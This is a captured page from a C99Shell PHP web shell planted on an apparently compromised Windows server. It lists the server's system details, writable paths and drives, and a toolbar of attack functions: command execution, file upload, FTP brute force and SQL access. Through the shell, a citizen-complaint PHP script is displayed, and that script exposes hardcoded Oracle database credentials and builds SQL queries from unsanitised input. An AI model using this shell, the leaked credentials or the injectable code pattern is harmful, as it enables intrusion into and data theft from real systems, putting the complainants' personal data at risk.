!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\quejas2006\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     insercionfinal_previo.php (4.39 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? session_start();
$ses = isset($usuario);
if ($ses == false) {
$usuario = "EMAIL";
}
$de = isset($loc);
if ($de == false) {
$loc = 0;
}
$db = "sia";?>
<?
$cp = OciLogon("EMAIL","EMAIL2003",$db);
$stmt = ociparse($cp,"SELECT NOMBRE FROM envista.LOCALIDAD WHERE LOCALIDAD_ID =".$_SESSION['idlocacion']."");
$result = OCIExecute($stmt);
while (OCIFetchInto($stmt, $cur)) {
$nomm = $cur[0];
//$nl = $cur[1];
//echo $nomm;
//echo $_SESSION['idlocacion'];
}
$_SESSION['nombreloc']= $_POST['loc'];
$_SESSION['barrio']= $_POST['barrio'];
$_SESSION['razoninfra']= strtoupper($_POST['razoninfra']);
$_SESSION['clase']=$_POST['clase'];
//$_SESSION['dirinfra']= $_POST['dirinfra'];
$_SESSION['dirinfra']= $_POST['dir1']." ".$_POST['numero']." ".$_POST['letra']." ".$_POST['bis']." ".$_POST['letra3']." ".$_POST['cuadrante1']." # ".$_POST['dir14']." ".$_POST['letra4']." ".$_POST['placa']." ".$_POST['cuadrante2']."  Nomenclatura:".$_POST['nomenclatura'];
$_SESSION['observaciones']= $_POST['observaciones'];
/*$campoXML = "<REGISTRO><DATAWEB><PERSONA ID=". $_SESSION['id'].">";
$campoXML = $campoXML."<NOMBRE>".$_SESSION['nombre']."</NOMBRE><TIPOPID>".$_SESSION['kindid']."</TIPOPID>";
$campoXML = $campoXML."<PID></PID><DIRECCION>".$_SESSION['direccion']."</DIRECCION><TELEFONO>".$_SESSION['telefono']."</TELEFONO>";
$campoXML = $campoXML. "<CORREO>".$_SESSION['email']."</CORREO><ANONIMO>".$_SESSION['anonimo1']."</ANONIMO></PERSONA></DATAWEB>";
$campoXML = $campoXML."<QUEJA><LOCALIDAD>".$nomm."</LOCALIDAD><BARRIO>".$_SESSION['barrio']."</BARRIO>";
$campoXML = $campoXML."<NOMINFRA>".$_SESSION['razoninfra']."</NOMINFRA><DIRINFRA>".$_SESSION['dirinfra']."</DIRINFRA>";
$campoXML = $campoXML."<CLASE>".$_SESSION['clase']."</CLASE>";
$campoXML = $campoXML."<TEXTOQUE>".$_SESSION['observaciones']."</TEXTOQUE></QUEJA><RECLAMO><RADICADO>".$_SESSION['codigoRAD']."</RADICADO>";
$campoXML = $campoXML."<TEXTOREC></TEXTOREC></RECLAMO></REGISTRO>"*/
$campoXML = "DENUNCIANTE: ".$_SESSION['nombre']." Tipo de documento: ".$_SESSION['kindid']." Número: ".$_SESSION['id'];
$campoXML = $campoXML." Dirección : ".$_SESSION['dirinfra']." Teléfono : ".$_SESSION['telefono']." ";
//$campoXML = $campoXML." Dirección : ".$_SESSION['direccion']." Teléfono : ".$_SESSION['telefono']." ";
$campoXML = $campoXML. " Correo: ".$_SESSION['email']." ¿es anónimo? ".$_SESSION['anonimo1']." ";
$campoXML = $campoXML." DATOS DEL SUPUESTO INFRACTOR - Localidad: ".$nomm." Barrio: ".$_SESSION['barrio']." ";
$campoXML = $campoXML." Nombre infractor: ".$_SESSION['razoninfra']." Dirección infractor: ".$_SESSION['dirinfra']." ";
$campoXML = $campoXML." Tipo de infracción: ".$_SESSION['clase']." ";
$campoXML = $campoXML." Texto de la queja: ".$_SESSION['observaciones']." Código de radicación: ".$_SESSION['codigoRAD']." ";
$campoXML = $campoXML." "
?>
<? 
///VERIFICAR PARA NULOS EN VDIRECCION
/*if ($Vdireccion==''){
$Vdireccion='NULL';
}else{
$Vdireccion=$Vdireccion;
}*/
$Vobservaciones=$_SESSION['observaciones'];
$Vasunto=$campoXML;
//$Vasunto="ESTA ES UNA CADENA DE PRUEBA QUE REEMPLAZA NUESTRO SUPER XML";
$Vcontacto_id=$_SESSION['codigoRAD'];
$sqlstr = "CALL COR.COR_PK_RADICACION.PR_INSERTA_QUEJA (";
if($_SESSION['direccion']!== ""){
    $sqlstr = $sqlstr . "'".$_SESSION['direccion']."', ";
    } else {
    $sqlstr = $sqlstr . "NULL, ";
    }
$sqlstr = $sqlstr . "'".$Vasunto."', '$Vobservaciones', '$Vcontacto_id', :valida_insert, :un_error)";
$valida_insert = "";
$un_error = "";
//echo "Consulta SQL: ".$sqlstr."<br>";?>
<? 
$c1 = OciLogon("QUEJOSO","QUEJOSO","DAMASIA");
$insertafinal = ociparse($c1, $sqlstr);
// http://phpbuilder.com/manual/en/function.oci-bind-by-name.php
oci_bind_by_name($insertafinal, ":valida_insert", $valida_insert, 32);
oci_bind_by_name($insertafinal, ":un_error", $un_error, 32);
OCIExecute($insertafinal);
//echo "RESUL0: ".$valida_insert;
//echo "<br />RESUL1: ".$un_error;
//// si resul0 es igual a NO_DATA muestre Consulta no fue posible de ejecutar en el momento... SI NO Su resul codigo queja es numero tal"
if ($valida_insert=="NO_DATA"){
$resultado="Ha ocurrido un error durante la inserción de su queja, por favor intente en unos minutos";
}else{
$resultado="<span class='Titportada'>Su queja ha sido radicada de manera exitosa, para efectos de seguimiento el número es <strong>".$valida_insert."</strong></span><br><br>";
}
$_SESSION['resultado']=$resultado;
?>
<?php
header
("location: tercera.php");
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--